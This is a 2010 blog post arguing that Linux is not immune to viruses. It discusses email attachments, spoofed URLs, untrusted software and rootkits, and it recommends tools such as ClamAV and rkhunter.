February 9, 2010

Myth Busting: Is Linux Immune to Viruses?

In a word, "no."

Any computer that is attached to a network is not immune to viruses. But, as with everything else, it's relative. If you compare the vulnerability of Linux to Windows, you can understand why so many say Linux is immune. But before we get into any myth busting, let's examine just what a computer virus is.

According to Wikipedia, a virus is a computer program that can copy itself and infect a computer. That's a pretty broad description. Most people would consider a more specific definition. That same Wiki page continues on to say The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, adware and spyware programs that do not have the reproductive ability. Now we're talking.  So with the two definitions combined, you could say a computer virus is any type of malicious code or software that can either infect a computer and replicate/distribute itself or a piece of malicious code or software that can be unwittingly distributed via numerous electronic means.

Means to an End

Computer viruses can be transmitted in many ways, such as:

  • Email attachments.

  • Malicious URLs.

  • Within applications (such as browser add ons).

  • Rootkits.

It will be my attempt, in this article, to show you that although it is very challenging for a virus to infect a Linux machine, that does not mean you should be without protection.

Email Attachments

Why are email attachments not so dangerous in Linux? Well, generally speaking it is because nearly all malicious email attachments target Windows machines. When you get those suspect attachments they are usually in the form of .exe or .zip files (the .zip files containing malicious .exe executable code). When you click on an .exe file in Linux your machine will not really know what to do with it (unless you have Wine installed).

But say that attachment has targeted Linux machines and is in the form of, say, .deb, .rpm, or .bin - what then? Those types of files can be installed on Linux machines. Well, first and foremost - if the file is in .deb format and you are using an RPM-based system, nothing will happen. If, however, you receive an email with a .rpm attachment, and you're using an RPM-based system, what happens? It will ask you for either your root or your sudo password (depending on your security model).

What would be the proper reaction to this? To not proceed. The difference between this model and the traditional Windows model is that when you double click on that attachment in Windows, the installation can proceed without your intervention. In certain instances there is no "sanity" check. Click and BOOM the virus has installed itself and you are infected.

Now naturally, if you are using a Windows machine, you are taking advantage of an anti-virus solution to prevent such issues from arising. What about Linux? Do you need an anti-virus for Linux? You might be surprised when I say "Yes!" But why? If Linux is so much more immune to viruses, why should you employ a virus scanner?

Let me ask you a simple question: Have you ever forwarded anything with attachments to another user? If so, is that user a Windows user? If so, you could very well have given that attachment a chance at a successful infection. So why not add a virus scan to your Linux system to avoid such an issue?

And if you manage your own email server (such as a Postfix or Sendmail server) on a Linux machine, anti-virus scanning is a must have. Just because your email server is a Linux machine does not mean an email containing a virus is non-lethal. That email-strapped virus could easily make its way to a Windows machine where it will happily begin its infectious life.

To that end, you owe it to yourself to install an anti-virus such as ClamAV.

Malicious URLs

I have yet to come across a URL that has done any direct damage to a Linux machine. But harmful URLs are not the only type of malicious URLs. One type of URL is a spoofed address. A spoofed address is a malicious address that masquerades itself as a safe address. These can be in the form of a fake bank account login screen, or Paypal login. Any number of addresses can be spoofed. And any address that requires you to log in with credentials is dangerous when spoofed.

Do these types of threats directly effect the Linux operating system? No, but they do effect the user. Fortunately most modern browsers have add ons to protect your browsing experience. These should not be neglected just because you are using Linux. A good sampling of Firefox add ons can be found in the Firefox Security Add on page.

Application Danger

Because Linux is open source, you can not trust every piece of software out there. You can, however, trust all software that is distributed by your distribution's OFFICIAL channels. For example, any software officially supported within the Ubuntu Software Center will be safe. Once you venture outside of the realm of the "Officially Supported," you risk installing malicious software.

That is not to say you should not trust any software not provided through the official channels of your distribution. Because Linux is open source, software is generally under a lot of peer scrutiny. No one wants to be known as the coder that created malicious Linux software.

But if you are of the paranoid persuasion, as long as you stick with software supported by your distribution, you should avoid installing any malicious code on your machine.

I will warn you, though, there was a proof of concept virus for Linux that took advantage of both GNOME and KDE launchers. This code could be added to either the ~/.config/autostart folder (For GNOME) or ~/.kde/Autostart (For KDE). Anyone really paranoid (using either GNOME or KDE) could create a bash script to search for, and delete, any suspicious files (or links) in that directory. Just be careful writing that script so that you do not delete anything important.

Got Root?

Root kits are the real danger. A root kit is a system of malicious software designed to obfuscate itself such that the user has no idea it was installed and is running. I have been a victim of a root kit (long ago) and strongly suggest the addition of the rkhunter tool. In fact, when installing a new Linux system, rkhunter is one of the first tools I add. And as soon as it is added, it is used.

Root kits are those nasty pieces of software that once installed are really difficult (if not impossible) to remove. And some root kits are so bad they compromise your system such that you can not recover. And if you're wondering how many root kits are out there, install rkhunter, run it, and see how many root kits it checks for. You will be surprised. And root kits do not just attack servers. I have seen desktop machines infected with root kits. This is especially true if your Linux machine lives on a static IP address with no firewall protection between it and the outside world.

Final Thoughts

So, what do you think? Is Linux immune to viruses? I hope your answer is "no." That answer, and the prevention it inspires, will keep your Linux machine virus free for years to come. Personally, I have used Linux for twelve years and not had a virus or any malicious software on any of my personal machines or servers. If you are cautious like me, you too can enjoy virus-free computing for years. But if you fall into the trap of believing that Linux is perfectly immune to viruses, you very well might fall victim to that naivety.



Click Here!